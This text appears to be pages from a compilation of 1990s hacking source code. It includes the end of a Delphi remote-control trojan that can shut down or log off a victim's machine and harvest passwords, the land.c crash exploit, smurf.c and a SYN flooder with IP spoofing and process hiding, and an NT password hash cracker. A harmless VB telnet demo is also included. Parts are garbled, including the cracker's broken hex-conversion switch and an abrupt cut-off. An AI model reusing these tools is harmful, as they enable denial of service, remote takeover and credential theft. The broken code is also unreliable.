inttostr(ServerSocket.Port)+chr(13)+chr(10));
if gotstr='time' then
Socket.SendText ('Remote Time/Date is '+
FormatDateTime ('hh:nn.ss "-" mmmm d, yyyy, dddd', Now) );
if gotstr='TEST?' then socket.sendtext('Server OK');
if copy (gotstr, 1, 5)='{MSG}' then
Socket.SendText ('User answered:'+ProcessMsg (gotstr));
if copy (gotstr, 1, 3)='{S}' then
if FileExists (extract (gotstr, 4, Length (gotstr))) then
begin
GetMem (TPC, Length (gotstr)-2);
// Length without '{S}' header and +1 for #0
StrPCopy (TPC, extract (gotstr, 4, Length (gotstr)));
PlaySound (TPC, 1);
FreeMem (TPC);
end;
if copy (gotstr, 1, 3)='{P}' then
ShowPicture (extract (gotstr, 4, Length (gotstr)));
if copy (gotstr, 1, 3)='{U}' then
begin
GetMem (TPC, Length (gotstr)-2);
// Length without '{U}' header and +1 for #0
StrPCopy (TPC, extract (gotstr, 4, Length (gotstr)));
ShellExecute (0, 'open', TPC, '', 'c:\', 1);
FreeMem (TPC);
end;
if gotstr='Name user' then
begin
TM:=50;
GetMem (TPC, 50);
GetUserName (TPC, TM);
Socket.SendText ('Current user: '+TPC);
FreeMem (TPC);
end;
if gotstr='Logoff' then
ExitWindowsEx (EWX_LOGOFF, TM);
if gotstr='Shutdown' then
ExitWindowsEx (EWX_SHUTDOWN, TM);
if gotstr='ReBOOT' then
ExitWindowsEx (EWX_REBOOT, TM);
if gotstr='PowerOFF' then
ExitWindowsEx (EWX_POWEROFF, TM);
if gotstr='DOWN' then
begin
PTimer.Enabled:=false;
Socket.SendText ('Timer off.');
end;
if gotstr='UP' then
begin
PTimer.Enabled:=true;
Socket.SendText ('Timer on.');
end;
if copy (gotstr, 1, 7)='setport' then
begin
Socket.SendText ('New port: '+extract(gotstr, 8, Length(gotstr)));
ServerSocket.Close;
ServerSocket.Port:=strtoint (extract(gotstr, 8, Length(gotstr)) );
RG.OpenKey ('SOFTWARE\Microsoft\General\Settings', TRUE);
RG.Destroy;
end;
if gotstr='Old me show?' then
begin
begin
RC:=RG.ReadInteger ('TCount');
socket.SendText ('{PLTS}');
for i:=1 to RC do
socket.SendText (RG.ReadString (inttostr(i))+chr(13)+chr(10));
socket.SendText ('{FTPL}'+chr(13)+chr(10));
end;
RG.Destroy;
end;
if gotstr='RESETALL' then
begin
begin
PX:=RG.ReadInteger ('TCount');
RG.DeleteValue ('TCount');
for i:=1 to PX do
RG.DeleteValue (inttostr(i));
end;
RG.Destroy;
end;
if gotstr='KillHER' then
begin
Socket.SendText ('Server killed!');
ServerSocket.Close;
RG.OpenKey ('SOFTWARE\Microsoft', FALSE);
RG.DeleteKey ('General');
RG.Destroy;
RG.DeleteValue ('Windll.exe');
RG.Destroy;
Halt (0);
end;
if gotstr='HELP?' then
begin
Socket.SendText ('---HELP---'+WrapStr);Sleep(100);
Socket.SendText ('KillHER - kill server'+WrapStr);Sleep(100);
Socket.SendText ('UP - switch password-looking timer
on'+WrapStr);Sleep(100);
Socket.SendText ('DOWN - off'+WrapStr);Sleep(100);
Socket.SendText ('Logoff - logoff user from
windows'+WrapStr);Sleep(100);
Socket.SendText ('Shutdown - shutdown windows'+WrapStr);Sleep(100);
Socket.SendText ('ReBOOT - reboot PC'+WrapStr);Sleep(100);
Socket.SendText ('PowerOFF - power off ;)'+WrapStr);Sleep(100);
Socket.SendText ('Name user - displays username'+WrapStr);Sleep(100);
Socket.SendText ('TEST? - tests server'+WrapStr);Sleep(100);
Socket.SendText ('time - displays time'+WrapStr);Sleep(100);
Socket.SendText ('ver - displays server version'+WrapStr);Sleep(100);
Socket.SendText ('----------'+WrapStr);Sleep(100);
end;
end; // if not sendfile
end; // if not recfile
end;
procedure TServerForm.FormClose(Sender: TObject; var Action: TCloseAction);

var RG: TRegistry;
begin
RG.OpenKey ('\SOFTWARE\Microsoft\General\Settings', FALSE);
RG.Destroy;
end;
procedure TServerForm.PTimerTimer(Sender: TObject);

begin
RegistryPasswords;
end;
end.
Página 221
Option Explicit
'This is a simple TELNET server supporting only one user and one comnection at a
time.
'Program can be enhanced for multiple user and for multiple users at a time.
'*****************************************
'Server side setup
'To start the DEMO. Open up your visual Basic 5.0 with the default
project(standard exe project)
'Place a winsock control. By default it will be named Winsock1.
'Then paste this piece of code into the form1's code section.
'Run the project.
'*****************************************
'*****************************************
'ClientSide Setup
'You can use the same machine or go to the other machine to test your server
'Go to the RUN prompt of your windows type telnet
'In the telnet's Connect menu option select Remote System...
'Now enter the ip address of the computer where your telnet server (demo
application) is running in the Host Name option
'Enter 23 or default value in the Host edit box
'Press Enter
'Yes, there comes your login screen.
'*****************************************
'*****************************************
'Any more clarification you can contact me at sirigere@usa.net
'*****************************************
'API Declaration
Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
'Form level variables
Dim UserID As String 'Store the UserID

Dim Password As String 'Store the Password
Dim AcceptedId As Boolean 'Toggle betwen the accepting of UserID or Password
Dim SuccessLoging As Boolean 'User logged in Successfully
Dim UserCommand As String 'Command issued by the user
Private Sub Form_Load()

'Initialisation routine
Winsock1.LocalPort = 23 'Set the telnet port
Winsock1.Listen 'Set the server to listen for a client request
UserID = ""
Password = ""
UserCommand = ""
AcceptedId = False
SuccessLoging = False
End Sub
Private Sub Winsock1_Close()

'When user wants to close the telnet connection
Winsock1.Close 'Close the telnet port

Winsock1.LocalPort = 23
Winsock1.Listen 'Listen for the new user
'Initialisation of the telnet server variables
UserID = ""
Password = ""
UserCommand = ""
AcceptedId = False
SuccessLoging = False
End Sub
Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long)

'User wants to connect to the server
If Winsock1.State <> sckClosed Then Winsock1.Close
Winsock1.Accept requestID
'Send him the accepted message and ask him to logon to the server
Winsock1.SendData "Enter LoginID for Sanjeev's Server: "
End Sub
Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)

Dim str1 As String
Dim MyName As String
Dim DirList() As String
Dim DirPointer As Integer
Dim ii As Integer
'User sending some information
Winsock1.GetData str1 'Receive the input from the client

If SuccessLoging Then 'Check whether user had already had logged in OR not.
If Asc(str1) = 13 Then
If UserCommand Like "dir*[\]" Then 'Processing the dir command issued
by the user
'Valied command will be for eg. dir c:\
Winsock1.SendData vbCrLf
UserCommand = Mid$(UserCommand, 4, Len(UserCommand) - 3)
DirPointer = 1
UserCommand = Trim(UserCommand)
'Routine to get the current directory listing
MyName = Dir(UserCommand, vbDirectory)
Do While MyName <> ""
If MyName <> "." And MyName <> ".." Then
If (GetAttr(UserCommand & MyName) And vbDirectory) =
vbDirectory Then
ReDim Preserve DirList(1 To DirPointer)
DirList(DirPointer) = MyName
DirPointer = DirPointer + 1
End If ' it represents a directory.
End If
MyName = Dir ' Get next entry.
Loop
For ii = 1 To DirPointer - 1
Winsock1.SendData DirList(ii) & vbCrLf
Next
Winsock1.SendData "Sanjeev>" 'Display the prompt
UserCommand = ""
ElseIf Trim(UserCommand) Like "exit" Then
'User wants to terminate the session
Winsock1_Close
UserCommand = ""
ElseIf Trim(UserCommand) Like "help" Then
'User requested for the set of commands supported by the server
Winsock1.SendData vbCrLf & "List of Commands supported by this
server" & vbCrLf
Winsock1.SendData "Dir <path\> --- to get the list of the
directory." & vbCrLf
Winsock1.SendData "exit --- to quit logout from the server." &
vbCrLf
Winsock1.SendData "time -- to get the time of the server." &
vbCrLf
Winsock1.SendData "help -- to get the list of commands supported
by the server." & vbCrLf
Winsock1.SendData "Sanjeev>"
UserCommand = ""
ElseIf Trim(UserCommand) Like "time" Then
'Send the user server's current time
Winsock1.SendData vbCrLf & Time & vbCrLf
UserCommand = ""
Else
'Its an invalied command or command not suported by the telnet
server
Winsock1.SendData vbCrLf & "Invalied Command" & vbCrLf & "For list
of commands use help command" & vbCrLf
UserCommand = ""
End If
Else
Winsock1.SendData str1
UserCommand = UserCommand & str1
End If
Else
'Get the user authentication
If AcceptedId And Asc(str1) = 13 Then
Winsock1.SendData vbCrLf & "Verifying your login information...." &
vbCrLf
If UserID = "sanjeev" And Password = "siri" Then
Sleep (2000)
Winsock1.SendData "Welcome Mr.Sanjeev Sirigere" & vbCrLf &
"Sanjeev>"
SuccessLoging = True
Else
AcceptedId = False
UserID = ""
Password = ""
Winsock1.SendData "Enter LoginID: "
Exit Sub
End If
ElseIf Asc(str1) = 13 Then
Winsock1.SendData str1 & vbCrLf & "Enter Password:"
AcceptedId = True
Exit Sub
ElseIf Not AcceptedId Then
Winsock1.SendData str1
End If
If AcceptedId Then
Password = Password & str1
Else
UserID = UserID & str1
End If
End If
End Sub
Página 228
/* land.c by m3lt, FLC

crashes a win95 box */
#include <stdio.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/ip_tcp.h>
#include <netinet/protocols.h>
struct pseudohdr
{
struct in_addr saddr;
struct in_addr daddr;
u_char zero;
u_char protocol;
u_short length;
struct tcphdr tcpheader;
};
u_short checksum(u_short * data,u_short length)

{
register long value;
u_short i;
for(i=0;i<(length>>1);i++)
value+=data[i];
if((length&1)==1)
value+=(data[i]<<8);
value=(value&65535)+(value>>16);
return(~value);
}
int main(int argc,char * * argv)

{
struct sockaddr_in sin;
struct hostent * hoste;
int sock;
char buffer[40];
struct iphdr * ipheader=(struct iphdr *) buffer;
struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct iphdr));
struct pseudohdr pseudoheader;
fprintf(stderr,"land.c by m3lt, FLC\n");
if(argc<3)
{
fprintf(stderr,"usage: %s IP port\n",argv[0]);
return(-1);
}
bzero(&sin,sizeof(struct sockaddr_in));
sin.sin_family=AF_INET;
if((hoste=gethostbyname(argv[1]))!=NULL)
bcopy(hoste->h_addr,&sin.sin_addr,hoste->h_length);
else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1)
{
fprintf(stderr,"unknown host %s\n",argv[1]);
return(-1);
}
if((sin.sin_port=htons(atoi(argv[2])))==0)
{
fprintf(stderr,"unknown port %s\n",argv[2]);
return(-1);
}
if((sock=socket(AF_INET,SOCK_RAW,255))==-1)
{
fprintf(stderr,"couldn't allocate raw socket\n");
return(-1);
}
bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr));

ipheader->version=4;
ipheader->ihl=sizeof(struct iphdr)/4;
ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr));
ipheader->id=htons(0xF1C);
ipheader->ttl=255;
ipheader->protocol=IP_TCP;
ipheader->saddr=sin.sin_addr.s_addr;
ipheader->daddr=sin.sin_addr.s_addr;
tcpheader->th_sport=sin.sin_port;
tcpheader->th_dport=sin.sin_port;
tcpheader->th_seq=htonl(0xF1C);
tcpheader->th_flags=TH_SYN;
tcpheader->th_off=sizeof(struct tcphdr)/4;
tcpheader->th_win=htons(2048);
bzero(&pseudoheader,12+sizeof(struct tcphdr));
pseudoheader.saddr.s_addr=sin.sin_addr.s_addr;
pseudoheader.daddr.s_addr=sin.sin_addr.s_addr;
pseudoheader.protocol=6;
pseudoheader.length=htons(sizeof(struct tcphdr));
bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct
tcphdr));
tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct
tcphdr));
if(sendto(sock,buffer,sizeof(struct iphdr)+sizeof(struct tcphdr),0,(struct

sockaddr *) &sin,sizeof(struct sockaddr_in))==-1)
{
fprintf(stderr,"couldn't send packet\n");
return(-1);
}
fprintf(stderr,"%s:%s landed\n",argv[1],argv[2]);
close(sock);
return(0);
}
Página 233
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netdb.h>
#include <ctype.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <string.h>
void banner(void);
void usage(char *);
void smurf(int, struct sockaddr_in, u_long, int);
void ctrlc(int);
unsigned short in_chksum(u_short *, int);
/* stamp */
char id[] = "$Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $";
int main (int argc, char *argv[])

{
struct hostent *he;
FILE *bcastfile;
int i, sock, bcast, delay, num, pktsize, cycle = 0, x;
char buf[32], **bcastaddr = malloc(8192);
banner();
signal(SIGINT, ctrlc);
if (argc < 6) usage(argv[0]);
if ((he = gethostbyname(argv[1])) == NULL) {

perror("resolving source host");
exit(-1);
}
memcpy((caddr_t)&sin.sin_addr, he->h_addr, he->h_length);
sin.sin_family = AF_INET;
sin.sin_port = htons(0);
num = atoi(argv[3]);
delay = atoi(argv[4]);
pktsize = atoi(argv[5]);
if ((bcastfile = fopen(argv[2], "r")) == NULL) {

perror("opening bcast file");
exit(-1);
}
x = 0;
while (!feof(bcastfile)) {
fgets(buf, 32, bcastfile);
if (buf[0] == '#' || buf[0] == '\n' || ! isdigit(buf[0])) continue;
for (i = 0; i < strlen(buf); i++)
if (buf[i] == '\n') buf[i] = '\0';
bcastaddr[x] = malloc(32);
strcpy(bcastaddr[x], buf);
x++;
}
bcastaddr[x] = 0x0;
fclose(bcastfile);
if (x == 0) {
fprintf(stderr, "ERROR: no broadcasts found in file %s\n\n", argv[2]);
exit(-1);
}
if (pktsize > 1024) {
fprintf(stderr, "ERROR: packet size must be < 1024\n\n");
exit(-1);
}
if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {

perror("getting socket");
exit(-1);
}
setsockopt(sock, SOL_SOCKET, SO_BROADCAST, (char *)&bcast, sizeof(bcast));
printf("Flooding %s (. = 25 outgoing packets)\n", argv[1]);
for (i = 0; i < num || !num; i++) {

if (!(i % 25)) { printf("."); fflush(stdout); }
smurf(sock, sin, inet_addr(bcastaddr[cycle]), pktsize);
cycle++;
if (bcastaddr[cycle] == 0x0) cycle = 0;
usleep(delay);
}
puts("\n\n");
return 0;
}
void banner (void)

{
puts("\nsmurf.c v4.0 by TFreak\n");
}
void usage (char *prog)

{
fprintf(stderr, "usage: %s <target> <bcast file> "
"<num packets> <packet delay> <packet size>\n\n"
"target = address to hit\n"
"bcast file = file to read broadcast addresses from\n"
"num packets = number of packets to send (0 = flood)\n"
"packet delay = wait between each packet (in ms)\n"
"packet size = size of packet (< 1024)\n\n", prog);
exit(-1);
}
void smurf (int sock, struct sockaddr_in sin, u_long dest, int psize)
{
struct iphdr *ip;
struct icmphdr *icmp;
char *packet;
packet = malloc(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);

ip = (struct iphdr *)packet;
icmp = (struct icmphdr *) (packet + sizeof(struct iphdr));
memset(packet, 0, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);
ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);

ip->ihl = 5;
ip->version = 4;
ip->ttl = 255;
ip->tos = 0;
ip->frag_off = 0;
ip->protocol = IPPROTO_ICMP;
ip->saddr = sin.sin_addr.s_addr;
ip->daddr = dest;
ip->check = in_chksum((u_short *)ip, sizeof(struct iphdr));
icmp->type = 8;
icmp->code = 0;
icmp->checksum = in_chksum((u_short *)icmp, sizeof(struct icmphdr) + psize);
sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize,

0, (struct sockaddr *)&sin, sizeof(struct sockaddr));
free(packet); /* free willy! */

}
void ctrlc (int ignored)

{
puts("\nDone!\n");
exit(1);
}
unsigned short in_chksum (u_short *addr, int len)

{
register int nleft = len;
register int sum = 0;
u_short answer = 0;
while (nleft > 1) {

sum += *addr++;
nleft -= 2;
}
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *)addr;
sum += answer;
}
sum = (sum >> 16) + (sum + 0xffff);

sum += (sum >> 16);
answer = ~sum;
return(answer);
}
Página 237
/* Syn Flooder by Zakath

* TCP Functions by trurl_ (thanks man).
* Some more code by Zakath.
* Speed/Misc Tweaks/Enhancments -- ultima
* Nice Interface -- ultima
* Random IP Spoofing Mode -- ultima
* How To Use:
* Usage is simple. srcaddr is the IP the packets will be spoofed from.
* dstaddr is the target machine you are sending the packets to.
* low and high ports are the ports you want to send the packets to.
* Random IP Spoofing Mode: Instead of typing in a source address,
* just use '0'. This will engage the Random IP Spoofing mode, and
* the source address will be a random IP instead of a fixed ip.
* Released: [4.29.97]
* To compile: cc -o synk4 synk4.c
*
*/
#include <signal.h>
#include <stdio.h>
#include <netdb.h>
#include <sys/time.h>
#include <linux/ip.h>
#include <linux/tcp.h>
/* These can be handy if you want to run the flooder while the admin is on
* this way, it makes it MUCH harder for him to kill your flooder */
/* Ignores all signals except Segfault */
// #define HEALTHY
/* Ignores Segfault */
// #define NOSEGV
/* Changes what shows up in ps -aux to whatever this is defined to */
// #define HIDDEN "vi .cshrc"
#define SEQ 0x28376839
#define getrandom(min, max) ((rand() % (int)(((max)+1) - (min))) + (min))
unsigned long send_seq, ack_seq, srcport;

char flood = 0;
int sock, ssock, curc, cnt;
/* Check Sum */
unsigned short
ip_sum (addr, len)
u_short *addr;
int len;
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
while (nleft > 1)

{
sum += *w++;
nleft -= 2;
}
if (nleft == 1)
{
*(u_char *) (&answer) = *(u_char *) w;
sum += answer;
}
sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* truncate to 16 bits */
return (answer);
}
void sig_exit(int crap)
{
#ifndef HEALTHY
printf("_[H_[JSignal Caught. Exiting Cleanly.\n");
exit(crap);
#endif
}
void sig_segv(int crap)
{
#ifndef NOSEGV
printf("_[H_[JSegmentation Violation Caught. Exiting Cleanly.\n");
exit(crap);
#endif
}
unsigned long getaddr(char *name) {

struct hostent *hep;
hep=gethostbyname(name);
if(!hep) {
fprintf(stderr, "Unknown host %s\n", name);
exit(1);
}
return *(unsigned long *)hep->h_addr;
}
void send_tcp_segment(struct iphdr *ih, struct tcphdr *th, char *data, int dlen) {
char buf[65536];
struct { /* rfc 793 tcp pseudo-header */
unsigned long saddr, daddr;
char mbz;
char ptcl;
unsigned short tcpl;
} ph;
struct sockaddr_in sin; /* how necessary is this, given that the destination
address is already in the ip header? */
ph.saddr=ih->saddr;
ph.daddr=ih->daddr;
ph.mbz=0;
ph.ptcl=IPPROTO_TCP;
ph.tcpl=htons(sizeof(*th)+dlen);
memcpy(buf, &ph, sizeof(ph));

memcpy(buf+sizeof(ph), th, sizeof(*th));
memcpy(buf+sizeof(ph)+sizeof(*th), data, dlen);
memset(buf+sizeof(ph)+sizeof(*th)+dlen, 0, 4);
th->check=ip_sum(buf, (sizeof(ph)+sizeof(*th)+dlen+1)&~1);
memcpy(buf, ih, 4*ih->ihl);

memcpy(buf+4*ih->ihl, th, sizeof(*th));
memcpy(buf+4*ih->ihl+sizeof(*th), data, dlen);
memset(buf+4*ih->ihl+sizeof(*th)+dlen, 0, 4);
ih->check=ip_sum(buf, (4*ih->ihl + sizeof(*th)+ dlen + 1) & ~1);

memcpy(buf, ih, 4*ih->ihl);
sin.sin_family=AF_INET;
sin.sin_port=th->dest;
sin.sin_addr.s_addr=ih->daddr;
if(sendto(ssock, buf, 4*ih->ihl + sizeof(*th)+ dlen, 0, &sin,

sizeof(sin))<0) {
printf("Error sending syn packet.\n"); perror("");
exit(1);
}
}
unsigned long spoof_open(unsigned long my_ip, unsigned long their_ip, unsigned

short port) {
int i, s;
struct iphdr ih;
struct tcphdr th;
int sinsize;
unsigned short myport=6969;
char buf[1024];
struct timeval tv;
ih.version=4;
ih.ihl=5;
ih.tos=0; /* XXX is this normal? */
ih.tot_len=sizeof(ih)+sizeof(th);
ih.id=htons(random());
ih.frag_off=0;
ih.ttl=30;
ih.protocol=IPPROTO_TCP;
ih.check=0;
ih.saddr=my_ip;
ih.daddr=their_ip;
th.source=htons(srcport);
th.dest=htons(port);
th.seq=htonl(SEQ);
th.doff=sizeof(th)/4;
th.ack_seq=0;
th.res1=0;
th.fin=0;
th.syn=1;
th.rst=0;
th.psh=0;
th.ack=0;
th.urg=0;
th.res2=0;
th.window=htons(65535);
th.check=0;
th.urg_ptr=0;
gettimeofday(&tv, 0);
send_tcp_segment(&ih, &th, "", 0);
send_seq = SEQ+1+strlen(buf);
}
void upsc()
{
int i;
char schar;
switch(cnt)
{
case 0:
{
schar = '|';
break;
}
case 1:
{
schar = '/';
break;
}
case 2:
{
schar = '-';
break;
}
case 3:
{
schar = '\\';
break;
}
case 4:
{
schar = '|';
cnt = 0;
break;
}
}
printf("_[H_[1;30m[_[1;31m%c_[1;30m]_[0m %d", schar, curc);
cnt++;
for(i=0; i<26; i++) {
i++;
curc++;
}
}
void init_signals()
{
// Every Signal known to man. If one gives you an error, comment it out!
signal(SIGHUP, sig_exit);
signal(SIGINT, sig_exit);
signal(SIGQUIT, sig_exit);
signal(SIGILL, sig_exit);
signal(SIGTRAP, sig_exit);
signal(SIGIOT, sig_exit);
signal(SIGBUS, sig_exit);
signal(SIGFPE, sig_exit);
signal(SIGKILL, sig_exit);
signal(SIGUSR1, sig_exit);
signal(SIGSEGV, sig_segv);
signal(SIGUSR2, sig_exit);
signal(SIGPIPE, sig_exit);
signal(SIGALRM, sig_exit);
signal(SIGTERM, sig_exit);
signal(SIGCHLD, sig_exit);
signal(SIGCONT, sig_exit);
signal(SIGSTOP, sig_exit);
signal(SIGTSTP, sig_exit);
signal(SIGTTIN, sig_exit);
signal(SIGTTOU, sig_exit);
signal(SIGURG, sig_exit);
signal(SIGXCPU, sig_exit);
signal(SIGXFSZ, sig_exit);
signal(SIGVTALRM, sig_exit);
signal(SIGPROF, sig_exit);
signal(SIGWINCH, sig_exit);
signal(SIGIO, sig_exit);
signal(SIGPWR, sig_exit);
}
main(int argc, char **argv) {
int i, x, max, floodloop, diff, urip, a, b, c, d;
unsigned long them, me_fake;
unsigned lowport, highport;
char buf[1024], *junk;
init_signals();
#ifdef HIDDEN
for (i = argc-1; i >= 0; i--)
/* Some people like bzero...i prefer memset:) */
memset(argv[i], 0, strlen(argv[i]));
strcpy(argv[0], HIDDEN);
#endif
if(argc<5) {
printf("Usage: %s srcaddr dstaddr low high\n", argv[0]);
printf(" If srcaddr is 0, random addresses will be used\n\n\n");
exit(1);
}
if( atoi(argv[1]) == 0 )
urip = 1;
else
me_fake=getaddr(argv[1]);
them=getaddr(argv[2]);
lowport=atoi(argv[3]);
highport=atoi(argv[4]);
srandom(time(0));
ssock=socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if(ssock<0) {
perror("socket (raw)");
exit(1);
}
sock=socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
if(sock<0) {
perror("socket");
exit(1);
}
junk = (char *)malloc(1024);
max = 1500;
i = 1;
diff = (highport - lowport);
if (diff > -1)

{
printf("_[H_[J\n\nCopyright (c) 1980, 1983, 1986, 1988, 1990, 1991 The
Regents of the University\n of California. All Rights Reserved.");
for (i=1;i>0;i++)
{
srandom((time(0)+i));
srcport = getrandom(1, max)+1000;
for (x=lowport;x<=highport;x++)
{
if ( urip == 1 )
{
a = getrandom(0, 255);
b = getrandom(0, 255);
c = getrandom(0, 255);
d = getrandom(0, 255);
sprintf(junk, "%i.%i.%i.%i", a, b, c, d);
me_fake = getaddr(junk);
}
spoof_open(/*0xe1e26d0a*/ me_fake, them, x);

/* A fair delay. Good for a 28.8 connection */
usleep(300);
if (!(floodloop = (floodloop+1)%(diff+1))) {
upsc(); fflush(stdout);
}
}
}
}
else {
printf("High port must be greater than Low port.\n");
exit(1);
}
}
Página 276
<++> NTPWC/ntpwc.c
/*
* (C) Nihil All rights reserved. A Guild Production.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include "byteorder.h"
#include "md4.h"
#define TRUE 1
#define FALSE 0
#define HASHSIZE 16
#define MAX_PASSWORD_LENGTH 14
#define uchar unsigned char

#define int16 unsigned short
#define uint16 unsigned short
#define uint32 unsigned int
typedef struct _USER_INFO

{
char* username;
unsigned long ntpassword[4];
}USER_INFO, *PUSER_INFO;
typedef struct _UNICODE_STRING

{
int16* buffer;
unsigned long length;
}UNICODE_STRING, *PUNICODE_STRING;
static int _my_mbstowcs(int16*, uchar*, int);

static int _my_wcslen(int16*);
void Cleanup(void);
int ParsePWEntry(char*, PUSER_INFO);
char pPWEntry[258];
char pDictEntry[129];
MDstruct MDContext;
int main(int argc,char *argv[])

{
FILE *hToCrack, *hDictionary;
PUSER_INFO pUserInfo;
PUNICODE_STRING pUnicodeDictEntry;
int i;
unsigned int uiLength;
atexit(Cleanup);
if (argc != 3)
{
printf("\nUsage: %s <password file> <dictionary file>\n", argv[0]);
exit(0);
}
/* open password file */

hToCrack = fopen(argv[1], "r");
if (hToCrack == NULL)
{
fprintf(stderr,"Unable to open password file\n");
exit(-1);
}
hDictionary = fopen(argv[2], "r");

if (hDictionary == NULL)
{
fprintf(stderr,"Unable to open dictionary file\n");
exit(-1);
}
pUserInfo = (PUSER_INFO)malloc(sizeof (USER_INFO));

if (pUserInfo == NULL)
{
fprintf(stderr,"Unable to allocate memory for user info structure\n");
exit(-1);
}
pUnicodeDictEntry = (PUNICODE_STRING)malloc(sizeof (UNICODE_STRING));

if (pUnicodeDictEntry == NULL)
{
fprintf(stderr,"Unable to allocate memory for unicode conversion\n");
free(pUserInfo);
exit(-1);
}
printf("\nCrack4NT is running...\n");
while (fgets(pPWEntry, sizeof (pPWEntry), hToCrack))

{
if (ParsePWEntry(pPWEntry, pUserInfo) == FALSE)

{
continue;
}
if (fseek(hDictionary, 0, SEEK_SET))
{
fprintf(stderr,"Unable to reset file pointer in dictionary\n");
memset(pUserInfo->ntpassword, 0, HASHSIZE);
free(pUserInfo);
free(pUnicodeDictEntry);
exit(-1);
}
while (fgets(pDictEntry, sizeof (pDictEntry), hDictionary))

{
if (pDictEntry[(strlen(pDictEntry) - 1)] == '\n')
{
pDictEntry[(strlen(pDictEntry) - 1)] = '\0';
}
uiLength = strlen((char *)pDictEntry);

if(uiLength > MAX_PASSWORD_LENGTH)
uiLength = MAX_PASSWORD_LENGTH;
pUnicodeDictEntry->length = (uiLength + 1) * sizeof(int16);
pUnicodeDictEntry->buffer = (int16*)malloc(pUnicodeDictEntry-
>length);
if (pUnicodeDictEntry->buffer == NULL)
{
fprintf(stderr,"Unable to allocate space for unicode
string\n");
exit(-1);
}
_my_mbstowcs( pUnicodeDictEntry->buffer, pDictEntry, uiLength);

pUnicodeDictEntry->buffer[uiLength] = 0;
uiLength = _my_wcslen(pUnicodeDictEntry->buffer) *
sizeof(int16);
MDbegin(&MDContext);
for(i = 0; i + 64 <= (signed)uiLength; i+= 64)
MDupdate(&MDContext,pUnicodeDictEntry->buffer + (i/2), 512);
MDupdate(&MDContext,pUnicodeDictEntry->buffer + (i/2),(uiLength-
i)*8);
if (memcmp(MDContext.buffer, pUserInfo->ntpassword, HASHSIZE) ==

0)
{
printf("Password for user %s is %s\n", pUserInfo-
>username, \
pDictEntry);
/* we are done with the password entry só free it */
free(pUnicodeDictEntry->buffer);
break;
}
free(pUnicodeDictEntry->buffer);
}
}
/* cleanup a bunch */
free(pUserInfo->username);
memset(pUserInfo->ntpassword, 0, HASHSIZE);
free(pUserInfo);
free(pUnicodeDictEntry);
/* everything is great */
printf("Crack4NT is finished\n");
return 0;
}
void Cleanup()
{
memset(pPWEntry, 0, 258);
memset(pDictEntry, 0, 129);
memset(&MDContext.buffer, 0, HASHSIZE);
}
int ParsePWEntry(char* pPWEntry, PUSER_INFO pUserInfo)

{
int HexToBin(char*, uchar*, int);
char pDelimiter[] = ":";

char* pTemp;
char pNoPW[] = "NO PASSWORD*********************";
char pDisabled[] = "********************************";
/* check args */
if (pPWEntry == NULL || pUserInfo == NULL)
{
return FALSE;
}
pTemp = strtok(pPWEntry, pDelimiter);

if (pTemp == NULL)
{
return FALSE;
}
pUserInfo->username = (char*)malloc(strlen(pTemp) + 1);

if (pUserInfo->username == NULL)
{
fprintf(stderr,"Unable to allocate memory for user name\n");
return FALSE;
}
strcpy(pUserInfo->username, pTemp);
strtok(NULL, pDelimiter);
strtok(NULL, pDelimiter);
pTemp = strtok(NULL, pDelimiter);

if (pTemp == NULL)
{
return FALSE;
}
if (strlen(pTemp) != 32)
{
return FALSE;
}
if (strcmp(pTemp, pNoPW) == 0)
{
printf("User %s has no password\n", pUserInfo->username);
return FALSE;
}
if (strcmp(pTemp, pDisabled) == 0)
{
printf("User %s is disabled most likely\n", pUserInfo->username);
return FALSE;
}
if (HexToBin((unsigned char*)pTemp, (uchar*)pUserInfo->ntpassword,16) ==

FALSE)
{
return FALSE;
}
memset(pTemp, 0, 32);
return TRUE;
}
int HexToBin(char* pHexString, uchar* pByteString, int count)

{
int i, j;
if (pHexString == NULL || pByteString == NULL)

{
fprintf(stderr,"A NULL pointer was passed to HexToBin()\n");
return FALSE;
}
memset(pByteString, 0, count);
for (i = 0, j = 0; i < (count * 2); i++)

{
switch (*(pHexString + i))
{
case '0': pByteString[j] ^= 0x00;
break;

break;

break;

break;

break;

break;

break;

break;

break;

break;
case 'a':
case 'A': pByteString[j] ^= 0x0A;
break;
case 'b':
case 'B': pByteString[j] ^= 0x0B;
break;
case 'c':
case 'C': pByteString[j] ^= 0x0C;
break;
case 'd':
case 'D': pByteString[j] ^= 0x0D;
break;
case 'e':
case 'E': pByteString[j] ^= 0x0E;
break;
case 'f':
case 'F': pByteString[j] ^= 0x0F;
break;
default: fprintf(stderr,"invalid character in NT MD4 string\n");

return FALSE;
}
if (i%2)
{
j ++;
}
if ((i%2) == 0)
{
pByteString[j] <<= 4;
}
}
return TRUE;
}
static int _my_wcslen(int16 *str)

{
int len = 0;
while(*str++ != 0)
len++;
return len;
}
static int _my_mbstowcs(int16 *dst, uchar *src, int len)

{
